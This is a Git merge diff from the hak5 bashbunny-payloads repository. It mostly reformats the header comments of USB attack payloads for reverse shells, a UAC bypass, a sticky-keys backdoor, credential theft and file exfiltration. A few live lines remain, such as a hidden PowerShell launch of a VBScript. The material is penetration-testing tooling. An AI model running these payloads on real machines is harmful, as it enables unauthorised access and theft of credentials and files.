Merge branch 'cleanup' of github.com:hak5/bashbunny-payloads into cleanup
commit
f582f57a34
|
@ -4,17 +4,15 @@
|
||||||
# Author: RalphyZ
|
# Author: RalphyZ
|
||||||
# Version: 1.1a
|
# Version: 1.1a
|
||||||
# Target: Windows 7+
|
# Target: Windows 7+
|
||||||
# Dependencies: VBScript (a.vbs) in the switch folder with this file
|
# Dependencies: Included a.vbs script
|
||||||
#
|
#
|
||||||
# Description: Executes a VBScript, concealed in a hidden PowerShell window
|
# Description: Executes a VBScript, concealed in a hidden PowerShell window
|
||||||
#
|
#
|
||||||
# Colors:
|
# LEDS:
|
||||||
# | Status | Color | Description |
|
# Magenta: Setting attack mode, getting the switch position
|
||||||
# | ---------- | ------------------------------| ------------------------------------------------ |
|
# Red Blink: Could not find the a.vbs script
|
||||||
# | SETUP | Magenta solid | Setting attack mode, getting the switch position |
|
# Yellow Single Blink: Running the VBScript
|
||||||
# | FAIL | Red slow blink | Could not find the a.vbs script |
|
# Green Blink to Solid: Script is finished
|
||||||
# | ATTACK | Yellow single blink | Running the VBScript |
|
|
||||||
# | FINISH | Green blink followed by SOLID | Script is finished |
|
|
||||||
|
|
||||||
# Magenta solid
|
# Magenta solid
|
||||||
LED SETUP
|
LED SETUP
|
||||||
|
|
|
@ -1,12 +1,19 @@
|
||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
#
|
#
|
||||||
# Title: RevShellBack
|
# Title: RevShellBack
|
||||||
# Description: Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet.
|
|
||||||
# Author: NodePoint
|
# Author: NodePoint
|
||||||
# Version: 0.1.3
|
# Version: 0.1.3
|
||||||
# Category: Execution
|
# Category: Execution
|
||||||
# Target: Windows
|
# Target: Windows
|
||||||
# Attackmodes: Ethernet, HID
|
# Attack Modes: RNDIS_ETHERNET, HID
|
||||||
|
# Description: Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet.
|
||||||
|
#
|
||||||
|
# LEDS:
|
||||||
|
# Magenta: Setup
|
||||||
|
# Yellow Single Blink: Open CMD
|
||||||
|
# Yellow Double Blink: Start Reverse Shell
|
||||||
|
# Cyan Blink: Attack
|
||||||
|
# Green: Finished
|
||||||
|
|
||||||
# Set attack mode
|
# Set attack mode
|
||||||
LED SETUP
|
LED SETUP
|
||||||
|
|
|
@ -2,17 +2,17 @@
|
||||||
|
|
||||||
# Title: ShellExec
|
# Title: ShellExec
|
||||||
# Author: audibleblink
|
# Author: audibleblink
|
||||||
# Target: Mac/Linux
|
# Target: Mac, Linux
|
||||||
# Version: 1.1
|
# Version: 1.1
|
||||||
|
# Attack Modes: ECM_ETHERNET, HID
|
||||||
|
# Description: Create a web server on the BashBunny and force the victim to download and execute a script.
|
||||||
|
# Perfect for when mass storage isn't an option.
|
||||||
#
|
#
|
||||||
# Create a web server on the BashBunny and force
|
# LEDS:
|
||||||
# the victim to download and execute a script.
|
# White: Ready
|
||||||
# Perfect for when mass storage isn't an option.
|
# Amber Blink: Waiting for server
|
||||||
#
|
# Blue Blink: Attacking
|
||||||
# White | Ready
|
# Green: Finished
|
||||||
# Ammber blinking | Waiting for server
|
|
||||||
# Blue blinking | Attacking
|
|
||||||
# Green | Finished
|
|
||||||
|
|
||||||
LED SETUP
|
LED SETUP
|
||||||
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
||||||
|
|
|
@ -1,15 +1,17 @@
|
||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
#
|
#
|
||||||
# Title: StickyBunny
|
# Title: StickyBunny
|
||||||
# Author: Squibs
|
# Author: Squibs
|
||||||
# Version: 0.3
|
# Version: 0.3
|
||||||
# Plug2Pwn: 18s
|
# Attack Modes: HID
|
||||||
|
# Target: Windows
|
||||||
|
# Runtime: 18s
|
||||||
|
# Description: Creates the sticky keys back door on a windows machine
|
||||||
#
|
#
|
||||||
# Creates the sticky keys back door on a windows machine
|
# LEDS:
|
||||||
#
|
# Blue: Preparing Attack
|
||||||
# Blue...............Preparing Attack
|
# Yellow: Attacking
|
||||||
# Yellow.............Attacking
|
# Green: Finished
|
||||||
# Green..............GTFO
|
|
||||||
|
|
||||||
#Open Admin Powershell
|
#Open Admin Powershell
|
||||||
ATTACKMODE HID
|
ATTACKMODE HID
|
||||||
|
|
|
@ -1,14 +1,24 @@
|
||||||
# Title: UACBypass
|
# Title: UACBypass
|
||||||
# Author: Skiddie
|
# Author: Skiddie
|
||||||
# Version: 1.1
|
# Version: 1.1
|
||||||
# Target: Windows
|
# Target: Windows
|
||||||
|
# Attack Modes: HID, STORAGE
|
||||||
#
|
#
|
||||||
# Description: Download and executes any binary executable with administrator privileges WITHOUT prompting the user for administrator rights (aka UAC bypass/exploit). Please define URL and SAVEFILENAME in the a.vbs script. Target does need internet connection. Works on Windows 7 - Windows 10. The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges. However from what i am aware version 7,8 and 8.1 are still effected. Currently fastest download and execute for HID attacks to date. (with UAC bypass)
|
# Description: Download and executes any binary executable with administrator privileges WITHOUT prompting
|
||||||
|
# the user for administrator rights (aka UAC bypass/exploit). Please define URL and SAVEFILENAME
|
||||||
|
# in the a.vbs script. Target does need internet connection. Works on Windows 7 - Windows 10.
|
||||||
|
# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges.
|
||||||
|
# However from what I am aware version 7,8 and 8.1 are still effected.
|
||||||
|
# Currently fastest download and execute for HID attacks to date. (with UAC bypass)
|
||||||
|
#
|
||||||
|
# LEDS:
|
||||||
|
# Magenta: Starting
|
||||||
|
# Green: Finished
|
||||||
|
|
||||||
#Define your bunny storage stick name
|
#Define your bunny storage stick name
|
||||||
DRIVER_LABEL='BashBunny'
|
DRIVER_LABEL='BashBunny'
|
||||||
|
|
||||||
#RED means starting
|
#Magenta means starting
|
||||||
LED SETUP
|
LED SETUP
|
||||||
|
|
||||||
#Gets File locations
|
#Gets File locations
|
||||||
|
@ -17,7 +27,6 @@ GET SWITCH_POSITION
|
||||||
#We are a keyboard
|
#We are a keyboard
|
||||||
ATTACKMODE HID STORAGE
|
ATTACKMODE HID STORAGE
|
||||||
|
|
||||||
|
|
||||||
QUACK DELAY 500
|
QUACK DELAY 500
|
||||||
RUN WIN powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'payloads\\$SWITCH_POSITION\a.vbs')"
|
RUN WIN powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'payloads\\$SWITCH_POSITION\a.vbs')"
|
||||||
QUACK DELAY 1000
|
QUACK DELAY 1000
|
||||||
|
|
|
@ -4,18 +4,17 @@
|
||||||
# Author: LowValueTarget
|
# Author: LowValueTarget
|
||||||
# Version: 1.2
|
# Version: 1.2
|
||||||
# Category: Powershell
|
# Category: Powershell
|
||||||
# Target: Windows XP SP3+ (Powershell)
|
# Target: Windows XP SP3+
|
||||||
# Attackmodes: HID, RNDIS_ETHERNET
|
# Attackmodes: HID, RNDIS_ETHERNET
|
||||||
# Firmware: >= 1.3
|
# Firmware: >= 1.3
|
||||||
|
# Description: Quick HID attack to retrieve and run powershell payload from BashBunny web server.
|
||||||
|
# Ensure p.txt (your powershell payload) exists in payload directory
|
||||||
#
|
#
|
||||||
# Quick HID attack to retrieve and run powershell payload from BashBunny web server
|
# LEDS:
|
||||||
# ensure p.txt (your powershell payload) exists in payload directory
|
# Yellow Single Blink: Running Initial Powershell Commands
|
||||||
#
|
# Yellow Double Blink: Delivering powershell payload
|
||||||
# | Attack Stage | Description |
|
# Green: Finished
|
||||||
# | ------------------- | ---------------------------------------- |
|
# Red Blink: Failure
|
||||||
# | Stage 1 | Running Initial Powershell Commands |
|
|
||||||
# | Stage 2 | Delivering powershell payload |
|
|
||||||
#
|
|
||||||
|
|
||||||
ATTACKMODE RNDIS_ETHERNET HID
|
ATTACKMODE RNDIS_ETHERNET HID
|
||||||
LED SETUP
|
LED SETUP
|
||||||
|
|
|
@ -4,26 +4,22 @@
|
||||||
# Author: LowValueTarget
|
# Author: LowValueTarget
|
||||||
# Version: 2.0
|
# Version: 2.0
|
||||||
# Category: Powershell
|
# Category: Powershell
|
||||||
# Target: Windows XP SP3+ (Powershell)
|
# Target: Windows XP SP3+
|
||||||
# Attackmodes: HID, RNDIS_ETHERNET
|
# Attack Modes: HID, RNDIS_ETHERNET
|
||||||
# Firmware: >= 1.2
|
# Firmware: >= 1.2
|
||||||
|
# Required Tools: impacket
|
||||||
|
# Description: Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer.
|
||||||
|
# Possibilities are limitless! Credentials captured by are stored as loot.
|
||||||
|
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
|
||||||
#
|
#
|
||||||
# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless!
|
# LEDS:
|
||||||
# Credentials captured by are stored as loot.
|
# Magenta: Setup
|
||||||
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
|
# Yellow Single Blink: Powershell
|
||||||
#
|
# Yellow Double Blink: Delivering powershell payload
|
||||||
# Required tools: impacket
|
# White: Clean up
|
||||||
=======
|
# Green: Finished
|
||||||
# Credentials captured by are stored as loot.
|
|
||||||
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
|
|
||||||
#
|
|
||||||
# Required tools: impacket
|
|
||||||
#
|
|
||||||
# | Attack Stage | Description |
|
|
||||||
# | ------------------- | ------------------------------|
|
|
||||||
# | Stage 1 | Powershell |
|
|
||||||
# | Stage 2 | Delivering powershell payload |
|
|
||||||
#
|
#
|
||||||
|
|
||||||
ATTACKMODE RNDIS_ETHERNET HID
|
ATTACKMODE RNDIS_ETHERNET HID
|
||||||
|
|
||||||
# SETUP
|
# SETUP
|
||||||
|
|
|
@ -1,16 +1,17 @@
|
||||||
# Title: BlackBackup
|
|
||||||
# Author: JWHeuver & JBaselier
|
|
||||||
# Version: 1.0
|
|
||||||
#
|
|
||||||
# Runs powershell script to get Wlan and logon credentials
|
|
||||||
# from computer and save them on USB drive (Storage attack)
|
|
||||||
#
|
|
||||||
# Purple.............Loading
|
|
||||||
# Green .............Execute Credential Ripper Powershell
|
|
||||||
# Off................Finished
|
|
||||||
#
|
|
||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Title: BlackBackup
|
||||||
|
# Author: JWHeuver & JBaselier
|
||||||
|
# Version: 1.0
|
||||||
|
# Description: Runs powershell script to get Wlan and logon credentials
|
||||||
|
# from computer and save them on USB drive (Storage attack)
|
||||||
|
#
|
||||||
|
# LEDS:
|
||||||
|
# Purple: Loading
|
||||||
|
# Green: Execute Credential Ripper Powershell
|
||||||
|
# Off: Finished
|
||||||
|
#
|
||||||
|
|
||||||
# OPTIONS - More options available in the Powershell payload
|
# OPTIONS - More options available in the Powershell payload
|
||||||
OBFUSCATECMD="N" # Y=yes or N=no
|
OBFUSCATECMD="N" # Y=yes or N=no
|
||||||
|
|
||||||
|
|
|
@ -1,18 +1,21 @@
|
||||||
#Title: FileInfoExfiltrator
|
#!/bin/bash
|
||||||
#Author: A_SarcasticGuy
|
|
||||||
#Version: 1.0
|
# Title: FileInfoExfiltrator
|
||||||
#Target: Windows
|
# Author: A_SarcasticGuy
|
||||||
|
# Version: 1.0
|
||||||
|
# Attack Modes: HID, STORAGE
|
||||||
|
# Targets: Windows
|
||||||
|
# Description: Runs Powershell that calls a .ps1 file to scan (in all subdirectories of path provided)
|
||||||
|
# for all files (by default starting on c:/) beginning with a #specific phrase (default "pass*")
|
||||||
|
# to then be outputted to a text file in the loot directory, in a subfolder with the name of the
|
||||||
|
# system and with a file name of the date and time of the scan.
|
||||||
|
# NOTE: p.ps1 MUST be in loot/payloads/ for this to work.
|
||||||
#
|
#
|
||||||
#Runs Powershell that calls a .ps1 file to scan (in all subdirectories of path provided) for all files (by default starting on c:/) beginning with a #specific phrase (default "pass*") to then #be outputted to a text file in the loot directory, in a subfolder with the name of the system and with a #file name of the date and time of the scan.
|
# LEDS
|
||||||
|
# Magenta: Script Started
|
||||||
|
# Yellow: Ducky Script Started
|
||||||
|
# Red: Failed to run Ducky Script, see log file
|
||||||
#
|
#
|
||||||
# Options: Search Directory: Find in p.bat (default c:/)
|
|
||||||
# Search criteria: Find in p.bat (default "pass*")
|
|
||||||
#
|
|
||||||
# Purple LED..................Script Started
|
|
||||||
# Yellow LED..................Ducky Script Started
|
|
||||||
# Red LED.....................Failed to run Ducky Script, see log file
|
|
||||||
#
|
|
||||||
# NOTE: p.ps1 MUST be in loot/payloads/ for this to work.
|
|
||||||
#
|
#
|
||||||
|
|
||||||
LED SETUP
|
LED SETUP
|
||||||
|
@ -23,29 +26,18 @@ ATTACKMODE HID STORAGE
|
||||||
|
|
||||||
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
|
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
|
||||||
|
|
||||||
|
|
||||||
#Call ducky script
|
#Call ducky script
|
||||||
LED STAGE1
|
LED STAGE1
|
||||||
|
|
||||||
|
|
||||||
QUACK ${SWITCH_POSITION}/ducky_script.txt
|
QUACK ${SWITCH_POSITION}/ducky_script.txt
|
||||||
|
|
||||||
|
|
||||||
QUACK DELAY 10000
|
QUACK DELAY 10000
|
||||||
|
|
||||||
LED FINISH
|
LED FINISH
|
||||||
|
|
||||||
else
|
else
|
||||||
|
|
||||||
|
|
||||||
LED FAIL
|
LED FAIL
|
||||||
|
|
||||||
|
|
||||||
#Red LED if unable to load script
|
#Red LED if unable to load script
|
||||||
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
|
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
|
||||||
|
|
||||||
|
|
||||||
exit 1
|
exit 1
|
||||||
|
|
||||||
|
|
||||||
fi
|
fi
|
||||||
|
|
|
@ -4,9 +4,9 @@
|
||||||
# Author: k1ul3ss
|
# Author: k1ul3ss
|
||||||
# Props: audibleblink
|
# Props: audibleblink
|
||||||
# Version: 1.0
|
# Version: 1.0
|
||||||
# Category: Exfiltration
|
# Targets: macOS
|
||||||
# Target: macOS
|
# Attack Modes: HID, Storage
|
||||||
# Attackmodes: HID, Storage
|
# Description: Finds all PDFs in the users Home directory, and then copies them to the Bunnys storage.
|
||||||
|
|
||||||
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
|
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
|
||||||
|
|
||||||
|
|
|
@ -3,10 +3,15 @@
|
||||||
# Title: Powershell Extractor
|
# Title: Powershell Extractor
|
||||||
# Author: $irLurk$alot
|
# Author: $irLurk$alot
|
||||||
# Version: 1.0
|
# Version: 1.0
|
||||||
# Target: Windows
|
# Targets: Windows
|
||||||
|
# Attack Modes: HID, STORAGE
|
||||||
|
# Description: Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
|
||||||
|
# which in turn runs powershell script to copy move and extract data.
|
||||||
#
|
#
|
||||||
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
|
# LEDS:
|
||||||
# which in turn runs powershell script to copy move and extract data.
|
# Magenta: Setting Up
|
||||||
|
# Yellow Blink: Executing Powershell
|
||||||
|
# Green: Finished
|
||||||
|
|
||||||
LED SETUP
|
LED SETUP
|
||||||
|
|
||||||
|
|
|
@ -2,13 +2,14 @@
|
||||||
#
|
#
|
||||||
# Title: sMacAndGrab
|
# Title: sMacAndGrab
|
||||||
# Author: audibleblink
|
# Author: audibleblink
|
||||||
# Target: macOS
|
# Targets: macOS
|
||||||
# Version: 1.2
|
# Version: 1.2
|
||||||
|
# Attack Modes: STORAGE, HID
|
||||||
|
# Description: Backup a list of files from macOS
|
||||||
#
|
#
|
||||||
# Backup a list of files from macOS
|
# LEDS:
|
||||||
#
|
# Yellow Blink: Attacking
|
||||||
# Yellow (blinking)...Attacking
|
# Green: Finished
|
||||||
# Green...............Finished
|
|
||||||
|
|
||||||
LED ATTACK
|
LED ATTACK
|
||||||
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
|
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
|
||||||
|
|
|
@ -1,16 +1,18 @@
|
||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
#
|
#
|
||||||
# Title: ExecutableInstaller
|
# Title: SmartFileExtract
|
||||||
# Author: IMcPwn (original)
|
# Author: IMcPwn
|
||||||
# Additions: SaintCrossbow (only for the parts to run SFE)
|
# Props: SaintCrossbow
|
||||||
# Version: 1.0
|
# Version: 1.0
|
||||||
# Target: Windows 7+
|
# Targets: Windows
|
||||||
#
|
# Description: Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
|
||||||
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
|
# which in turn executes e.cmd invisibly using i.vbs
|
||||||
# which in turn executes e.cmd invisibly using i.vbs
|
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
|
||||||
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
|
# using the --startup parameter. Change these settings inside of e.cmd.
|
||||||
# using the --startup parameter. Change these settings inside of e.cmd.
|
|
||||||
#
|
#
|
||||||
|
# LEDS:
|
||||||
|
# Red: Attacking
|
||||||
|
# Green: Finished
|
||||||
|
|
||||||
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
|
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
|
||||||
source bunny_helpers.sh
|
source bunny_helpers.sh
|
||||||
|
|
|
@ -1,12 +1,18 @@
|
||||||
# Title: TwoStageMac
|
# Title: TwoStageMac
|
||||||
# Description: A simple two stage payload for OSX. Sample second stage
|
# Description: A simple two stage payload for OSX. Sample second stage
|
||||||
# does some device profiling.
|
# does some device profiling.
|
||||||
|
#
|
||||||
# Author: Draxiom
|
# Author: Draxiom
|
||||||
# Props: jdetmold
|
# Props: jdetmold
|
||||||
# Version: 1.0
|
# Version: 1.0
|
||||||
# Category: Exfiltration
|
# Category: Exfiltration
|
||||||
# Target: OSX
|
# Target: OSX
|
||||||
# Attack Modes: HID, STORAGE
|
# Attack Modes: HID, STORAGE
|
||||||
|
# LEDS:
|
||||||
|
# Magenta - Setup
|
||||||
|
# Yellow Blink - Attacking
|
||||||
|
# White - Clean up
|
||||||
|
# Green - Finished
|
||||||
|
|
||||||
LED SETUP
|
LED SETUP
|
||||||
ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
|
ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
|
||||||
|
|
|
@ -2,16 +2,17 @@
|
||||||
#
|
#
|
||||||
# Title: BrowserData
|
# Title: BrowserData
|
||||||
# Author: zachstanford
|
# Author: zachstanford
|
||||||
# Version: 0.1 (Tested on Windows 10)
|
# Version: 0.1
|
||||||
|
# Targets: Windows
|
||||||
|
# Attack Modes: HID, STORAGE
|
||||||
|
# Description: Dumps browser info like history and bookmarks from powershell script
|
||||||
|
# then saves them in /root/udisk/loot/BrowserData/%ComputerName%
|
||||||
|
# Credits to this Empire's powershell script:
|
||||||
|
# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1
|
||||||
#
|
#
|
||||||
# Dumps browser info like history and bookmarks from powershell script
|
# LEDS:
|
||||||
# then saves them in /root/udisk/loot/BrowserData/%ComputerName%
|
# Blue: Running Script
|
||||||
# Credits to this Empire's powershell script:
|
# Magenta: Finished
|
||||||
# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1
|
|
||||||
|
|
||||||
#script
|
|
||||||
# Blue...............Running Script
|
|
||||||
# Purple.............Finished
|
|
||||||
|
|
||||||
# Not sure if this is the right variable. Feel free to change it.
|
# Not sure if this is the right variable. Feel free to change it.
|
||||||
|
|
||||||
|
@ -23,7 +24,6 @@ LED R SLOW
|
||||||
LOOTDIR=/root/udisk/loot/BrowserData
|
LOOTDIR=/root/udisk/loot/BrowserData
|
||||||
mkdir -p $LOOTDIR
|
mkdir -p $LOOTDIR
|
||||||
|
|
||||||
|
|
||||||
LED B SLOW
|
LED B SLOW
|
||||||
|
|
||||||
# wait 6 seconds for the storage to popup
|
# wait 6 seconds for the storage to popup
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
# Dropbox Exfiltrator
|
# Title: Dropbox Exfiltrator
|
||||||
# Author: Hak5Darren
|
# Author: Hak5Darren
|
||||||
# Props: jimcola99 Buchanan
|
# Props: jimcola99, Buchanan
|
||||||
# Demo: Hak5 episode 2505
|
# Demo: Hak5 Episode 2505
|
||||||
# Target: Windows Vista+
|
# Targets: Windows
|
||||||
# Category: Exfiltration
|
# Description: Exfiltrate via DropBox
|
||||||
|
#
|
||||||
|
# LEDS:
|
||||||
|
# Magenta: Setup
|
||||||
|
# Yellow Blink: Getting Script
|
||||||
|
# Green: Finish
|
||||||
|
|
||||||
LED SETUP
|
LED SETUP
|
||||||
ATTACKMODE HID
|
ATTACKMODE HID
|
||||||
|
|
|
@ -1,19 +1,17 @@
|
||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
#
|
#
|
||||||
# Title: FTP Exfiltrator
|
# Title: FTP Exfiltrator
|
||||||
# Author: Nutt
|
# Author: Nutt
|
||||||
# Version: 1.0
|
# Version: 1.0
|
||||||
# Target: Windows
|
# Targets: Windows
|
||||||
|
# Description: Exfiltrates files from the users Documents folder FTP's all files/folders to a specified
|
||||||
|
# FTP site named by the victim hostname. Powershell FTP script will stay running after
|
||||||
|
# BashBunny is unpluggedonce light turns green unplug and check FTP site.
|
||||||
#
|
#
|
||||||
#Exfiltrates files from the users Documents folder
|
# LEDS:
|
||||||
#FTP's all files/folders to a specified FTP site named by the victim hostname.
|
# Purple: Setup
|
||||||
#Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site.
|
# Red: Failed - Need to work on
|
||||||
|
# Green: Finished
|
||||||
#Executes 1.ps1
|
|
||||||
|
|
||||||
#Purple.........Setup
|
|
||||||
#Red............Failed - Need to work on
|
|
||||||
#Green..........Finished
|
|
||||||
|
|
||||||
LED SETUP
|
LED SETUP
|
||||||
GET SWITCH_POSITION
|
GET SWITCH_POSITION
|
||||||
|
|
|
@ -1,31 +1,22 @@
|
||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
#
|
#
|
||||||
# Title: Optical Exfiltration
|
# Title: Optical Exfiltration
|
||||||
# Author: bg-wa
|
# Author: bg-wa
|
||||||
# Version: 1.0
|
# Version: 1.0
|
||||||
# Category: HID
|
# Targets: macOS, Linux
|
||||||
# Target: *NIX
|
# Attack Modes: HID
|
||||||
# Attackmodes: HID
|
# Sources: Hak5 2320, https://github.com/bg-wa/QRExtractor
|
||||||
# Sources: Hak5 2320, https://github.com/bg-wa/QRExtractor
|
# Description: Quick HID only attack to write an HTML/JS file to target machine
|
||||||
|
# and open a browser, to exfiltrate data Using QR Codes and a video recording device.
|
||||||
|
# Optional html params:
|
||||||
|
# base64: Passing a base64 string to this param will auto-start processing QR Codes.
|
||||||
|
# playback: Passing the string "finish" to this param will auto-play the results, when QR codes finish rendering.
|
||||||
|
# Example: Ln65: Q STRING firefox "$target_html?playback=finish&base64=my_long_string"
|
||||||
#
|
#
|
||||||
# Quick HID only attack to write an HTML/JS file to target machine
|
# LEDS:
|
||||||
# and open a browser, to exfiltrate data Using QR Codes and a video
|
# Magenta: Open vi
|
||||||
# recording device.
|
# Yellow Blink: Writing HTML
|
||||||
#
|
# Green: Browser Ready/Processing
|
||||||
# Optional html params:
|
|
||||||
# base64: Passing a base64 string to this param will auto-start processing QR Codes.
|
|
||||||
#
|
|
||||||
# playback: Passing the string "finish" to this param will auto-play the results,
|
|
||||||
# when QR codes finish rendering.
|
|
||||||
#
|
|
||||||
# Example:
|
|
||||||
# Ln65: Q STRING firefox "$target_html?playback=finish&base64=my_long_string"
|
|
||||||
#
|
|
||||||
# | Attack Stage | Description |
|
|
||||||
# | ------------------- | ---------------------------------------- |
|
|
||||||
# | SETUP | Open vi |
|
|
||||||
# | ATTACK | Writing HTML |
|
|
||||||
# | FINISH | Browser Ready/Processing |
|
|
||||||
#
|
#
|
||||||
|
|
||||||
ATTACKMODE HID
|
ATTACKMODE HID
|
||||||
|
|
|
@ -1,4 +1,16 @@
|
||||||
# Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: simple-usb-extractor
|
||||||
|
# Version: 1.0
|
||||||
|
# Author: danthegoodman1
|
||||||
|
# Targets: Windows
|
||||||
|
# Attack Modes: HID, STORAGE
|
||||||
|
# Description: Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs
|
||||||
|
#
|
||||||
|
# LEDS:
|
||||||
|
# Yellow Blink - Attacking
|
||||||
|
# Green - Finished
|
||||||
|
|
||||||
GET SWITCH_POSITION
|
GET SWITCH_POSITION
|
||||||
LED ATTACK
|
LED ATTACK
|
||||||
ATTACKMODE HID STORAGE
|
ATTACKMODE HID STORAGE
|
||||||
|
|
|
@ -4,47 +4,20 @@
|
||||||
# Author: Hak5Darren
|
# Author: Hak5Darren
|
||||||
# Props: ImNatho, mike111b, madbuda
|
# Props: ImNatho, mike111b, madbuda
|
||||||
# Version: 1.1
|
# Version: 1.1
|
||||||
# Category: Exfiltration
|
# Target: Windows XP
|
||||||
# Target: Windows XP SP3+ (Powershell)
|
# Attack Modes: HID, RNDIS_ETHERNET
|
||||||
# Attackmodes: HID, Ethernet
|
# Requires: Impacket Tool
|
||||||
|
# Description: Exfiltrates select files from users's documents folder via SMB.
|
||||||
|
# Liberated documents will reside in Bash Bunny loot directory under
|
||||||
|
# loot/smb_exfiltrator/HOSTNAME/DATE_TIME. Exfiltration options configured from included s.ps1 script.
|
||||||
#
|
#
|
||||||
# CHANGELOG
|
# LEDS:
|
||||||
# =========
|
# Red: Failed to find dependencies
|
||||||
# Rewrite of the original SMB Exfiltrator payload with:
|
# Yellow Single Blink: HID Stage
|
||||||
# - Faster copying, using robocopy multithreaded mode
|
# Yellow Double Blink: Ethernet Stage
|
||||||
# - Faster finish, using a EXFILTRATION_COMPLETE file
|
# Cyan: Receiving Files
|
||||||
# - Offload logic to target PC for accurate date/time
|
# White: Moving Liberated Files
|
||||||
# - Clears tracks by default without second run dialog
|
# Green: Finished
|
||||||
# - Test-Connection handling by ICMP (no lame sleeps)
|
|
||||||
# - Hidden powershell window by default
|
|
||||||
#
|
|
||||||
# REQUIREMENTS
|
|
||||||
# ============
|
|
||||||
# Needs impacket to be copied to /tools/impacket and installed
|
|
||||||
# Option A:
|
|
||||||
# 1. Download impacket from https://github.com/CoreSecurity/impacket
|
|
||||||
# 2. Copy impacket folder to /tools on the Bash Bunny flash drive
|
|
||||||
# 3. Boot Bash Bunny into arming mode and connect to console via serial
|
|
||||||
# 4. Issue "python /tools/impacket/setup.py install"
|
|
||||||
# Option B:
|
|
||||||
# 1. Download impacket deb package
|
|
||||||
# 2. Copy impacket.deb to /tools on the Bash Bunny flash drive
|
|
||||||
# 3. Boot Bash Bunny into arming mode. Impacket will install automatically.
|
|
||||||
#
|
|
||||||
# LED STATUS
|
|
||||||
# ==========
|
|
||||||
# FAIL........Failed to find dependencies
|
|
||||||
# STAGE1......HID Stage
|
|
||||||
# STAGE2......Ethernet Stage
|
|
||||||
# SPECIAL.....Receiving Files
|
|
||||||
# CLEANUP.....Moving Liberated Files
|
|
||||||
# FINISH......Finished
|
|
||||||
#
|
|
||||||
# OPTIONS
|
|
||||||
# =======
|
|
||||||
# Exfiltration options configured from included s.ps1 script
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
######## INITIALIZATION ########
|
######## INITIALIZATION ########
|
||||||
REQUIRETOOL impacket
|
REQUIRETOOL impacket
|
||||||
|
|
|
@ -3,14 +3,16 @@
|
||||||
# Title: USB Exfiltrator
|
# Title: USB Exfiltrator
|
||||||
# Author: Hak5Darren
|
# Author: Hak5Darren
|
||||||
# Version: 1.1
|
# Version: 1.1
|
||||||
# Target: Windows XP SP3+
|
# Target: Windows XP
|
||||||
# Props: Diggster, IMcPwn
|
# Props: Diggster, IMcPwn
|
||||||
# Category: Exfiltration
|
# Description: Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
|
||||||
#
|
# which in turn executes e.cmd invisibly using i.vbs
|
||||||
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
|
# which in turn copies documents to the loot folder on the Bash Bunny.
|
||||||
# which in turn executes e.cmd invisibly using i.vbs
|
|
||||||
# which in turn copies documents to the loot folder on the Bash Bunny.
|
|
||||||
#
|
#
|
||||||
|
# LEDS:
|
||||||
|
# Yellow Blink: Attacking
|
||||||
|
# Green: Finished
|
||||||
|
|
||||||
GET SWITCH_POSITION
|
GET SWITCH_POSITION
|
||||||
LED ATTACK
|
LED ATTACK
|
||||||
ATTACKMODE HID STORAGE
|
ATTACKMODE HID STORAGE
|
||||||
|
|
Loading…
Reference in New Issue